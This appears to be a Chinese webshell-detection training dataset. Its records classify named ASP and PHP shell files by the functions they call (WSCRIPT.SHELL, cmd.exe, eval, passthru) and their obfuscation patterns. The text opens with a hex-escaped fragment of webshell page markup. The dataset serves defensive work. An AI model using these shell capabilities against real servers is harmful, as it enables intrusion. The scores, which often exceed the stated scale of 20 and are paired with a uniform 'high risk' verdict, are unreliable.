"\\x3e\".\"\\x3c\\x74r\\x3e\\x3c\\x74d\\x3e\\x3c\\x73\\x70\\x61\\x6e\\x3e\\x42\\x72\\x75te \\x74\\x79pe\".\"\\x3c\\x74d>\\x3cl\\x61\\x62\\x65l><\\x69\\x6ep\\x75t ty\\x70\\x65=\\x72\\x61dio n\\x61m\\x65\\x3dt\\x79\\x70e va\\x6c\\x75e\\x3d\\x221\\x22 ch\\x65\\x63k\\x65\\x64>\\x20/e, file_get_contents(, fwrite(, fputs( 发现混淆技术: base64_decode, hex2bin, ord\\s*\\( 包含网络功能: curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 733/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/wso.php", "malicious_score": 733, "md5_hash": "1be18354cc48be5faafb724b1d2e8ec0"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"54af38a9a761eb38f9d3968548b260fd.asp\", \"文件类型\": \"asp\", \"文件大小\": \"56301 bytes\", \"行数\": 1102}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: response.Write, Request.QueryString, Response.write, CreateObject(, Createobject( 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 1245/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/54af38a9a761eb38f9d3968548b260fd.asp", "malicious_score": 1245, "md5_hash": "14224d77f803c5dfc8454ff1b4f5893e"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"6568f174161db7f6400180ba3285217f.asp\", \"文件类型\": \"asp\", \"文件大小\": \"1468 bytes\", \"行数\": 53}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: CreateObject(, Request.Form, WSCRIPT.SHELL, Response.Write, cmd.exe 恶意度评分: 21/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/6568f174161db7f6400180ba3285217f.asp", "malicious_score": 21, "md5_hash": "97af88b478422067f23b001dd06d56a9"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"4685c63b87b72adbbbdad5bc9d1b501b.asp\", \"文件类型\": \"asp\", \"文件大小\": \"981 bytes\", \"行数\": 44}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Request.form, response.write, CreateObject( 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/4685c63b87b72adbbbdad5bc9d1b501b.asp", "malicious_score": 15, "md5_hash": "e63f5a96570e1faf4c7b8ca6df750237"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"RemExp.asp\", \"文件类型\": \"asp\", \"文件大小\": \"7445 bytes\", \"行数\": 250}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Request.QueryString, Response.Write, CreateObject( 恶意度评分: 54/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/RemExp.asp", "malicious_score": 54, "md5_hash": "851175ba9247b8f95050394abf166763"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Tool.asp\", \"文件类型\": \"asp\", \"文件大小\": \"45569 bytes\", \"行数\": 792}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Request.QueryString, CreateObject(, Createobject(, WSCRIPT.SHELL, Request.Form 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 813/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/Tool.asp", "malicious_score": 813, "md5_hash": "9681d5a97e7ed48c54aafcabfb3de881"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"a75188dcb24265710ae863c4f0641f86.asp\", \"文件类型\": \"asp\", \"文件大小\": \"34485 bytes\", \"行数\": 828}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: response.Write, request.QueryString, Request.querystring, Request.QueryString, request.querystring 发现混淆技术: chr\\s*\\( 恶意度评分: 440/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/a75188dcb24265710ae863c4f0641f86.asp", "malicious_score": 440, "md5_hash": "1c01f8a88baee39aa1cebec644bbcb99"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"686db284a7b917f6b847ac9a0de04f6f.asp\", \"文件类型\": \"asp\", \"文件大小\": \"42390 bytes\", \"行数\": 1156}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write, WSCRIPT.SHELL, CreateObject( 发现混淆技术: ord\\s*\\(, chr\\s*\\( 恶意度评分: 139/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/686db284a7b917f6b847ac9a0de04f6f.asp", "malicious_score": 139, "md5_hash": "dae3f60bc0944c1aaace48a54c6ad31b"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"fbd19d604c7b4c9320341e1c6aae9143.asp\", \"文件类型\": \"asp\", \"文件大小\": \"1468 bytes\", \"行数\": 53}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: CreateObject(, Request.Form, WSCRIPT.SHELL, Response.Write, cmd.exe 恶意度评分: 21/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/fbd19d604c7b4c9320341e1c6aae9143.asp", "malicious_score": 21, "md5_hash": "97af88b478422067f23b001dd06d56a9"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"kacak.asp\", \"文件类型\": \"asp\", \"文件大小\": \"33511 bytes\", \"行数\": 953}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: createobject(, Request.querystring, request.querystring, CreateObject(, response.write 发现混淆技术: base64_decode, chr\\s*\\( 恶意度评分: 130/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/kacak.asp", "malicious_score": 130, "md5_hash": "360781378076de40cf4bea73e1fbb05f"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"aspmuma.asp\", \"文件类型\": \"asp\", \"文件大小\": \"1605 bytes\", \"行数\": 47}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: createobject(, CreateObject( 发现混淆技术: chr\\s*\\( 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/aspmuma.asp", "malicious_score": 8, "md5_hash": "1ba7661e69cd613ce13bd72380a71aef"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"list.asp\", \"文件类型\": \"asp\", \"文件大小\": \"1372 bytes\", \"行数\": 79}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write, CreateObject( 恶意度评分: 30/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/list.asp", "malicious_score": 30, "md5_hash": "1cfa493a165eb4b43e6d4cc0f2eab575"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2684a6bb34502e211b6fcfa9134260e8.asp\", \"文件类型\": \"asp\", \"文件大小\": \"63639 bytes\", \"行数\": 2324}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Execute(, Wscript.Shell, CreateObject(, Request.form, request.form 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 489/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/2684a6bb34502e211b6fcfa9134260e8.asp", "malicious_score": 489, "md5_hash": "b32d1730d23a660fd6aa8e60c3dc549f"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"caonima4.0.asp\", \"文件类型\": \"asp\", \"文件大小\": \"93146 bytes\", \"行数\": 1234}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: createobject(, Execute(, wscript.shell, execute(, CreateObject( 发现混淆技术: chr\\s*\\( 恶意度评分: 191/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/caonima4.0.asp", "malicious_score": 191, "md5_hash": "12fa06759bd3420ad4fd4716e47b3caa"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"bumiezhihun.asp\", \"文件类型\": \"asp\", \"文件大小\": \"101722 bytes\", \"行数\": 1373}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Execute(, wscript.shell, execute(, CreateObject(, Createobject( 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 330/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/bumiezhihun.asp", "malicious_score": 330, "md5_hash": "8a1bc8557f10c33587b4583a74af103e"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"efbbc2663b2c1a3bc4fed7f2e3268aff.asp\", \"文件类型\": \"asp\", \"文件大小\": \"1372 bytes\", \"行数\": 79}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write, CreateObject( 恶意度评分: 30/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/efbbc2663b2c1a3bc4fed7f2e3268aff.asp", "malicious_score": 30, "md5_hash": "1cfa493a165eb4b43e6d4cc0f2eab575"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"gaoji4.asp\", \"文件类型\": \"asp\", \"文件大小\": \"83098 bytes\", \"行数\": 1454}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Eval(, createobject(, Execute(, request.QueryString, wscript.shell 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 279/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/gaoji4.asp", "malicious_score": 279, "md5_hash": "f0c1833c67e9b5f03043607f85f3695f"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"redhat_unencry.asp\", \"文件类型\": \"asp\", \"文件大小\": \"94857 bytes\", \"行数\": 2996}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: createobject(, Execute(, request.queryString, execute(, request.Form 发现混淆技术: chr\\s*\\( 恶意度评分: 80/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/redhat_unencry.asp", "malicious_score": 80, "md5_hash": "bec92b1096273649ef8e936428080824"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"d84191ac8599fa56bd30893f86a52ec3.asp\", \"文件类型\": \"asp\", \"文件大小\": \"7445 bytes\", \"行数\": 250}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Request.QueryString, Response.Write, CreateObject( 恶意度评分: 54/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/d84191ac8599fa56bd30893f86a52ec3.asp", "malicious_score": 54, "md5_hash": "851175ba9247b8f95050394abf166763"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"36557d6877c0870a36d66a4bc64bafed.asp\", \"文件类型\": \"asp\", \"文件大小\": \"25121 bytes\", \"行数\": 615}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Execute(, Server.execute, wscript.shell, execute(, Request.QueryString 发现混淆技术: chr\\s*\\( 恶意度评分: 107/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/36557d6877c0870a36d66a4bc64bafed.asp", "malicious_score": 107, "md5_hash": "158b4edb2680db938a4dff73dc24a751"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"yinghezhanjian_2012.asp\", \"文件类型\": \"asp\", \"文件大小\": \"90203 bytes\", \"行数\": 1189}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: createobject(, Execute(, wscript.shell, execute(, CReATEoBJEcT( 发现混淆技术: chr\\s*\\( 恶意度评分: 191/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/yinghezhanjian_2012.asp", "malicious_score": 191, "md5_hash": "8738282045ea77a65a280d426252c78c"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ntdaddy.asp\", \"文件类型\": \"asp\", \"文件大小\": \"41788 bytes\", \"行数\": 1013}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: CreateObject(, Request.form, request.form, Request.Form, WSCRIPT.SHELL 发现混淆技术: chr\\s*\\( 恶意度评分: 776/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/ntdaddy.asp", "malicious_score": 776, "md5_hash": "3c0e713347e5a86134f7349aa50234d9"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"sadrazam.php\", \"文件类型\": \"php\", \"文件大小\": \"27964 bytes\", \"行数\": 7}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: eval(, base64_decode( 发现混淆技术: base64_decode 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/sadrazam.php", "malicious_score": 8, "md5_hash": "48763bdd47801432650fa48ccb4508de"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cmd.asp\", \"文件类型\": \"asp\", \"文件大小\": \"923 bytes\", \"行数\": 47}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write, cmd.exe, WSCRIPT.SHELL, CreateObject( 恶意度评分: 18/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/cmd.asp", "malicious_score": 18, "md5_hash": "895ca846858c315a3ff8daa7c55b3119"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"0a3dbdfbada4b5a814735d4a703f3867.asp\", \"文件类型\": \"asp\", \"文件大小\": \"1428 bytes\", \"行数\": 55}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: CreateObject(, Request.Form, WSCRIPT.SHELL, Response.Write, cmd.exe 恶意度评分: 21/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/0a3dbdfbada4b5a814735d4a703f3867.asp", "malicious_score": 21, "md5_hash": "64f24f09ec6efaa904e2492dffc518b9"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"modchange.asp\", \"文件类型\": \"asp\", \"文件大小\": \"2028 bytes\", \"行数\": 64}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: request.Form, Response.WRItE, CreateObject( 恶意度评分: 30/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/modchange.asp", "malicious_score": 30, "md5_hash": "8b97ed3d0b11700f5fc519603b4c38b2"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"gaoji.asp\", \"文件类型\": \"asp\", \"文件大小\": \"63922 bytes\", \"行数\": 623}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: REquEst.form, createobject(, Execute(, wscript.shell, execute( 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 195/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/gaoji.asp", "malicious_score": 195, "md5_hash": "c7cb0d58158eacbe8b664a86a33ac675"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"b17631d0bbce103d24a115fa4f65bb4b.asp\", \"文件类型\": \"asp\", \"文件大小\": \"116827 bytes\", \"行数\": 2294}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Request.QueryString, eval(, Request.Form, request.form, response.write 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 885/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/b17631d0bbce103d24a115fa4f65bb4b.asp", "malicious_score": 885, "md5_hash": "dda2258df6411e360b67fc920bc763d6"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"970b44f5d671082e50ba5136c4afd940.asp\", \"文件类型\": \"asp\", \"文件大小\": \"45127 bytes\", \"行数\": 1195}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: response.Write, request.QueryString, Response.write, CreateObject(, CreateObject ( 发现混淆技术: chr\\s*\\( 恶意度评分: 455/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/970b44f5d671082e50ba5136c4afd940.asp", "malicious_score": 455, "md5_hash": "3eef0ca45346ce55e845c6a002639532"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"bb876345427c936c8169c6a4b669245c.asp\", \"文件类型\": \"asp\", \"文件大小\": \"33542 bytes\", \"行数\": 899}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: createobject(, Request.querystring, request.querystring, CreateObject(, response.write 恶意度评分: 123/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/bb876345427c936c8169c6a4b669245c.asp", "malicious_score": 123, "md5_hash": "d24bcd6a4f80fea26d64e3850d0c19cd"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"shell_decoded.asp\", \"文件类型\": \"asp\", \"文件大小\": \"136109 bytes\", \"行数\": 2198}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: createobject(, Execute(, wscript.shell, CreateObject(, request.form 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 942/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/shell_decoded.asp", "malicious_score": 942, "md5_hash": "f2d2694eab72bfc59b7d714a81b2f4c8"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"mini.php\", \"文件类型\": \"php\", \"文件大小\": \"25909 bytes\", \"行数\": 2}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_GET[, $_POST[, file_get_contents( 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\(, copy\\s*\\( 恶意度评分: 118/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/mini.php", "malicious_score": 118, "md5_hash": "c3791f16af5e094d10883bc98833d10d"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"redirect.asp\", \"文件类型\": \"asp\", \"文件大小\": \"14640 bytes\", \"行数\": 294}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Request.QueryString, Response.Write, Request.Form, CreateObject( 恶意度评分: 84/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/redirect.asp", "malicious_score": 84, "md5_hash": "97da83c6e3efbba98df270cc70beb8f8"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"e719356d2fdf889d3c20a8d106773683.asp\", \"文件类型\": \"asp\", \"文件大小\": \"138231 bytes\", \"行数\": 513}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: REquEst.form, createobject(, Execute(, wscript.shell, CreateObject( 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 270/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/e719356d2fdf889d3c20a8d106773683.asp", "malicious_score": 270, "md5_hash": "109b14515582a6f99491759bddfa8e74"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"dabao.asp\", \"文件类型\": \"asp\", \"文件大小\": \"25824 bytes\", \"行数\": 770}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write, CreateObject( 发现混淆技术: pack\\s*\\( 恶意度评分: 53/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/dabao.asp", "malicious_score": 53, "md5_hash": "731f4272ef76ac0815bb050046af2d28"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"aspcmd.asp\", \"文件类型\": \"asp\", \"文件大小\": \"8350 bytes\", \"行数\": 304}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write, WScript.Shell 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/aspcmd.asp", "malicious_score": 6, "md5_hash": "f738a100b3ae802a9b77581d156a09fd"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"unkonwnnu.asp\", \"文件类型\": \"asp\", \"文件大小\": \"126905 bytes\", \"行数\": 1746}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: request.form, Request.Form, response.write, Execute(, CreateObject( 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 927/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/unkonwnnu.asp", "malicious_score": 927, "md5_hash": "f780f97930b0f1ef4c39d4f14d17c46c"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ak74shell.php\", \"文件类型\": \"php\", \"文件大小\": \"57390 bytes\", \"行数\": 2}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, $_POST[, eval(, passthru( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 150/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/ak74shell.php", "malicious_score": 150, "md5_hash": "36fc307d3c9c9f4266219184eed07ffa"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"6d3f52cc770659b045da0d3338fc1484.asp\", \"文件类型\": \"asp\", \"文件大小\": \"38479 bytes\", \"行数\": 1004}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: CreateObject(, Request.form, request.form, Request.Form, WSCRIPT.SHELL 发现混淆技术: chr\\s*\\( 恶意度评分: 776/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/6d3f52cc770659b045da0d3338fc1484.asp", "malicious_score": 776, "md5_hash": "c7fda2d9b971f88df34085c8019df08f"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"fuccck.asp\", \"文件类型\": \"asp\", \"文件大小\": \"99978 bytes\", \"行数\": 2061}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: wscript.shell, Cmd.exe, eval(, request.form, Request.Form 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 354/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/fuccck.asp", "malicious_score": 354, "md5_hash": "cc63e673031ea368bbca25ae4931b42a"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"f6bf08acde84f3d4688382f952f47f31.asp\", \"文件类型\": \"asp\", \"文件大小\": \"34837 bytes\", \"行数\": 829}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: response.Write, request.QueryString, Request.querystring, Request.QueryString, request.querystring 发现混淆技术: chr\\s*\\( 恶意度评分: 440/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/f6bf08acde84f3d4688382f952f47f31.asp", "malicious_score": 440, "md5_hash": "bd51742fa9b3ff1e6236d97e423eb6d0"}}
{"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"7b706edb43ff86080aad817ca5e4796a.asp\", \"文件类型\": \"asp\", \"文件大小\": \"41788 bytes\", \"行数\": 1013}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: CreateObject(, Request.form, request.form, Request.Form, WSCRIPT.SHELL 发现混淆技术: chr\\s*\\( 恶意度评分: 776/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/ASP/dama/7b706edb43ff86080aad817ca5e4796a.asp", "malicious_score": 776, "md5_hash": "3c0e713347e5a86134f7349aa50234d9"}}
